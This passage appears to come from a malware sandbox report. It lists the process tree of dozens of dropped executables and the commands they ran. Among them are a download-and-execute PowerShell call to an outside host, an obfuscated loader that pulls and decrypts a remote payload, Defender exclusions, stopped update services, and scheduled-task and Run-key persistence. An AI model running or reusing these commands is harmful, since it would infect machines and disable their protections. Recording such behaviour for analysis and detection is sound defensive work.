    "C:\Users\Admin\AppData\Local\Temp\adasda.exe"
    3⤵
    PID:4432
- C:\Users\Admin\AppData\Local\Temp\Files\file.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
  2⤵
  PID:2608
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')"
    3⤵
    PID:6656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')
      4⤵
      PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Files\file.exe" >> NUL
    3⤵
    PID:6496
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:4692
- C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"
  2⤵
  PID:6372
- - C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\029375780db860b29c868bb8e790fc388d6a0cce986be2b6af6e0bd5d85a5e31.exe"
    3⤵
    PID:964
- C:\Users\Admin\AppData\Local\Temp\Files\clp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\clp.exe"
  2⤵
  PID:6748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFE4C.tmp.bat""
    3⤵
    PID:4840
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5684
  - - C:\ProgramData\AdobeReader\GeforceUpdater.exe
      "C:\ProgramData\AdobeReader\GeforceUpdater.exe"
      4⤵
      PID:6572
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MicrosoftEdgeUpdateTaskMachineCoreCor" /tr "C:\ProgramData\AdobeReader\GeforceUpdater.exe"
        5⤵
        
        PID:7124
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "MicrosoftEdgeUpdateTaskMachineCoreCor" /tr "C:\ProgramData\AdobeReader\GeforceUpdater.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:5556
- C:\Users\Admin\AppData\Local\Temp\Files\bin.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"
  2⤵
  PID:7032
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:3084
- C:\Users\Admin\AppData\Local\Temp\Files\83f32a3d2dc9e3d9903f395a20b8ddd74a1f35487c6dffd67d9d9a014961f9d0.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\83f32a3d2dc9e3d9903f395a20b8ddd74a1f35487c6dffd67d9d9a014961f9d0.exe"
  2⤵
  PID:6632
- C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cs_maltest.exe"
  2⤵
  PID:6444
- C:\Users\Admin\AppData\Local\Temp\Files\Installer.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Installer.exe"
  2⤵
  PID:2884
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1076
- C:\Users\Admin\AppData\Local\Temp\Files\swizzy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\swizzy.exe"
  2⤵
  PID:4016
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6240
- C:\Users\Admin\AppData\Local\Temp\Files\more.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmp824D.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:2704
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
    3⤵
    PID:5900
- - C:\Users\Admin\AppData\Local\Temp\Files\more.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
    3⤵
    PID:3028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4EFA.tmp.bat""
      4⤵
      PID:6092
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:4912
    - - C:\Users\Admin\AppData\Roaming\images.exe
        
        "C:\Users\Admin\AppData\Roaming\images.exe"
        5⤵
        
        PID:2880
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
        6⤵
        
        PID:4044
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmp125.tmp"
        6⤵
        
        PID:4888
      - C:\Users\Admin\AppData\Roaming\images.exe
        
        "C:\Users\Admin\AppData\Roaming\images.exe"
        6⤵
        
        PID:1184
      - C:\Users\Admin\AppData\Roaming\images.exe
        
        "C:\Users\Admin\AppData\Roaming\images.exe"
        6⤵
        
        PID:5636
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "images" /tr '"C:\Users\Admin\AppData\Roaming\images.exe"' & exit
      4⤵
      PID:5760
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "images" /tr '"C:\Users\Admin\AppData\Roaming\images.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:7356
- C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"
  2⤵
  PID:4452
- - C:\Users\Admin\AppData\Local\Temp\is-63JL2.tmp\tuc4.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-63JL2.tmp\tuc4.tmp" /SL5="$D02BA,7293273,54272,C:\Users\Admin\AppData\Local\Temp\Files\tuc4.exe"
    3⤵
    PID:5764
  - - C:\Users\Admin\AppData\Local\MP3_Cutter_Joiner\MP3CutterJoiner.exe
      "C:\Users\Admin\AppData\Local\MP3_Cutter_Joiner\MP3CutterJoiner.exe" -i
      4⤵
      PID:2276
  - - C:\Users\Admin\AppData\Local\MP3_Cutter_Joiner\MP3CutterJoiner.exe
      "C:\Users\Admin\AppData\Local\MP3_Cutter_Joiner\MP3CutterJoiner.exe" -s
      4⤵
      PID:2516
- C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
  2⤵
  PID:4928
- - C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe
    "C:\Users\Admin\AppData\Local\Temp\rhsgn_protected.exe"
    3⤵
    PID:5708
  - - C:\Users\Admin\AppData\Local\Temp\ARA.exe
      "C:\Users\Admin\AppData\Local\Temp\ARA.exe"
      4⤵
      PID:5244
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\aUs3pwix5Vd1U6IYzTsfZ9E8dEV3MF.vbe"
        5⤵
        
        PID:2060
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\WJgXY0RCE6WdWGoPyLk7f.bat" "
        6⤵
        
        PID:5484
        
        C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe
        
        "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"
        7⤵
        
        PID:5976
- C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe"
  2⤵
  PID:980
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:5516
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 980 -s 1128
    3⤵
    - Program crash
    PID:6372
- C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\socks5-clean.exe"
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypass -File socks5-clean.ps1
    3⤵
    PID:2388
- C:\Users\Admin\AppData\Local\Temp\Files\6.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\6.exe"
  2⤵
  PID:7128
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  PID:1052
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    3⤵
    PID:5060
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_technical_school';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_technical_school' -Value '"C:\Users\Admin\AppData\Local\Tests_for_preparation_for_technical_school\Tests_for_preparation_for_technical_school.exe"' -PropertyType 'String'
    3⤵
    PID:5140
- C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\syncUpd.exe"
  2⤵
  PID:2916
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2916 -s 836
    3⤵
    - Program crash
    PID:4440
- C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  PID:5612
- - C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
    "C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe"
    3⤵
    PID:5324
  - - C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
      C:\Users\Admin\AppData\Local\Temp\BLduscfibj.exe
      4⤵
      PID:3368
- - C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    3⤵
    PID:6480
- - C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    3⤵
    PID:3204
- - C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
    3⤵
    PID:3316
- C:\Users\Admin\AppData\Local\Temp\Files\univ.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"
  2⤵
  PID:3504
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 1320
    3⤵
    - Program crash
    PID:5560
- C:\Users\Admin\AppData\Local\Temp\Files\1233213123213.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\1233213123213.exe"
  2⤵
  PID:5752
- C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rty45.exe"
  2⤵
  PID:980
- C:\Users\Admin\AppData\Local\Temp\Files\Gzxzuhejdab.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Gzxzuhejdab.exe"
  2⤵
  PID:5100
- C:\Users\Admin\AppData\Local\Temp\Files\plink.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\plink.exe"
  2⤵
  PID:5284
- C:\Users\Admin\AppData\Local\Temp\Files\plugins.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\plugins.exe"
  2⤵
  PID:5048
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    PID:4088
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1608
      4⤵
      PID:3292
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1608
      4⤵
      PID:4080
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 948
    3⤵
    PID:5016
- C:\Users\Admin\AppData\Local\Temp\Files\b5ed26bd6f40eda4ff90ec9b4a60b295c77a723d38ebebb0c70997caedc6fb8c.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\b5ed26bd6f40eda4ff90ec9b4a60b295c77a723d38ebebb0c70997caedc6fb8c.exe"
  2⤵
  PID:548
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 340
    3⤵
    PID:7476
- C:\Users\Admin\AppData\Local\Temp\Files\GorgeousMovement.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\GorgeousMovement.exe"
  2⤵
  PID:880
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k cmd < Suddenly & exit
    3⤵
    PID:3928
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:3004
- C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
  2⤵
  PID:4388
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Musical_rhythms_for_certain_actions';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Musical_rhythms_for_certain_actions' -Value '"C:\Users\Admin\AppData\Local\Musical_rhythms_for_certain_actions\Musical_rhythms_for_certain_actions.exe"' -PropertyType 'String'
    3⤵
    PID:5812
- C:\Users\Admin\AppData\Local\Temp\Files\v1220-55000.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\v1220-55000.exe"
  2⤵
  PID:6408
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 1048
    3⤵
    PID:4136
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 1068
    3⤵
    PID:7444
- C:\Users\Admin\AppData\Local\Temp\Files\ugorichzx.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ugorichzx.exe"
  2⤵
  PID:4944
- - C:\Users\Admin\AppData\Local\Temp\Files\ugorichzx.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\ugorichzx.exe"
    3⤵
    PID:4060
- C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe"
  2⤵
  PID:5152
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN buildcosta.exe /TR "C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3916
- - C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe
    "C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe"
    3⤵
    PID:7968
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 376
      4⤵
      PID:7992
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 376
      4⤵
      PID:3532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 680
      4⤵
      PID:6744
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 692
      4⤵
      PID:3820
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 692
      4⤵
      PID:7312
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 760
      4⤵
      PID:7652
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:8400
- - C:\Users\Admin\AppData\Local\Temp\1000126001\toolspub1.exe
    "C:\Users\Admin\AppData\Local\Temp\1000126001\toolspub1.exe"
    3⤵
    PID:4116
- - C:\Users\Admin\AppData\Local\Temp\1000127001\InstallSetup7.exe
    "C:\Users\Admin\AppData\Local\Temp\1000127001\InstallSetup7.exe"
    3⤵
    PID:4400
- - C:\Users\Admin\AppData\Local\Temp\1000129001\FirstZ.exe
    "C:\Users\Admin\AppData\Local\Temp\1000129001\FirstZ.exe"
    3⤵
    PID:5672
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      PID:7132
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:7028
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1736
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:8844
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:6916
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:8676
- C:\Users\Admin\AppData\Local\Temp\Files\w-12.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\w-12.exe"
  2⤵
  PID:1452
- C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gookcom.exe"
  2⤵
  PID:1716
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $danaAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $aramisAlannah = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NDE2OTU=')); $sherpasReparel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTBhNjg=')); $oberonDana = new-object System.Net.Sockets.TcpClient; $oberonDana.Connect($danaAlannah, [int]$aramisAlannah); $alannahArain = $oberonDana.GetStream(); $oberonDana.SendTimeout = 300000; $oberonDana.ReceiveTimeout = 300000; $gliomaArain = [System.Text.StringBuilder]::new(); $gliomaArain.AppendLine('GET /' + $sherpasReparel); $gliomaArain.AppendLine('Host: ' + $danaAlannah); $gliomaArain.AppendLine(); $gliomaAramis = [System.Text.Encoding]::ASCII.GetBytes($gliomaArain.ToString()); $alannahArain.Write($gliomaAramis, 0, $gliomaAramis.Length); $onusArain = New-Object System.IO.MemoryStream; $alannahArain.CopyTo($onusArain); $alannahArain.Dispose(); $oberonDana.Dispose(); $onusArain.Position = 0; $gliomaSowback = $onusArain.ToArray(); $onusArain.Dispose(); $sowbackAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback).IndexOf('`r`n`r`n')+1; $gliomaAlannah = [System.Text.Encoding]::ASCII.GetString($gliomaSowback[$sowbackAlannah..($gliomaSowback.Length-1)]); $gliomaAlannah = [System.Convert]::FromBase64String($gliomaAlannah); $sherpasSowback = New-Object System.Security.Cryptography.AesManaged; $sherpasSowback.Mode = [System.Security.Cryptography.CipherMode]::CBC; $sherpasSowback.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $sherpasSowback.Key = [System.Convert]::FromBase64String('yhw+bQ6dDyupOV1xzuOhL65Top3x+yWenlXd6UEYqAM='); $sherpasSowback.IV = [System.Convert]::FromBase64String('pXmM/4stDHWwo+KOQjpI+A=='); $sherpasAramis = $sherpasSowback.CreateDecryptor(); $gliomaAlannah = $sherpasAramis.TransformFinalBlock($gliomaAlannah, 0, $gliomaAlannah.Length); $sherpasAramis.Dispose(); $sherpasSowback.Dispose(); $alannahSherpas = New-Object System.IO.MemoryStream(, $gliomaAlannah); $aramisSherpas = New-Object System.IO.MemoryStream; $oberonAramis = New-Object System.IO.Compression.GZipStream($alannahSherpas, [IO.Compression.CompressionMode]::Decompress); $oberonAramis.CopyTo($aramisSherpas); $gliomaAlannah = $aramisSherpas.ToArray(); $onusSherpas = [System.Reflection.Assembly]::Load($gliomaAlannah); $aramisArain = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZHJlbnRJb3M=')); $onusGlioma = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('c293YmFja0FyYWlu')); $onusSowback = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b251c0FsYW5uYWg=')); $reparelGlioma = $onusSherpas.GetType($aramisArain + '.' + $onusGlioma); $sherpasOberon = $reparelGlioma.GetMethod($onusSowback); $sherpasOberon.Invoke($alannahSowback, (, [string[]] (''))); #($alannahSowback, $alannahSowback);
    3⤵
    PID:552
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 572
    3⤵
    PID:8976
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 572
    3⤵
    PID:8864
- C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
  2⤵
  PID:2632
- C:\Users\Admin\AppData\Local\Temp\Files\lodir.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lodir.exe"
  2⤵
  PID:5500
- C:\Users\Admin\AppData\Local\Temp\Files\901d3bacbe82db5382c4f653efb11d4784254b3ad727530c73ae327b734c1a4b.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\901d3bacbe82db5382c4f653efb11d4784254b3ad727530c73ae327b734c1a4b.exe"
  2⤵
  PID:2716
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2716 -s 352
    3⤵
    PID:7476
- C:\Users\Admin\AppData\Local\Temp\Files\1230.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\1230.exe"
  2⤵
  PID:5512
- C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"
  2⤵
  PID:4808
- - C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe
    C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe
    3⤵
    PID:6432
- - C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe
    C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe
    3⤵
    PID:3472
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 460
      4⤵
      PID:7944
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 472
      4⤵
      PID:7688
- C:\Users\Admin\AppData\Local\Temp\Files\VmManagedSetup.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VmManagedSetup.exe"
  2⤵
  PID:8092
- C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\360TS_Setup_Mini_WW.Ginmobi.CPI202401_6.6.0.1060.exe"
  2⤵
  PID:8036
- C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\elevator.exe"
  2⤵
  PID:4044
- C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe"
  2⤵
  PID:6084
- - C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\3b9da1066d77143b24ee1c9b9c9787f63400bc599fcaf4bfc8f58efc802cf760.exe"
    3⤵
    PID:4820
- C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe"
  2⤵
  PID:7332
- - C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\12cc22da6901d5fc26e8f2d3ee79a1c346f83a7ae43e25d1384e1df23d9adb69.exe"
    3⤵
    PID:5512
- C:\Users\Admin\AppData\Local\Temp\Files\uedfh12.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\uedfh12.exe"
  2⤵
  PID:3824
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3284
- C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe"
  2⤵
  PID:6308
- C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SuburbansKamacite.exe"
  2⤵
  PID:5256
- C:\Users\Admin\AppData\Local\Temp\Files\brg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"
  2⤵
  PID:7324
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5604
- C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe"
  2⤵
  PID:8148
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
    3⤵
    PID:5744
- - C:\Windows\Temp\tel.exe
    "C:\Windows\Temp\tel.exe"
    3⤵
    PID:5536
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:5116
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 240
      4⤵
      PID:6156
- - C:\Windows\Temp\fcc.exe
    "C:\Windows\Temp\fcc.exe"
    3⤵
    PID:6428
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe\bebra.exe
      4⤵
      PID:4216
- - C:\Windows\Temp\jjj.exe
    "C:\Windows\Temp\jjj.exe"
    3⤵
    PID:3188
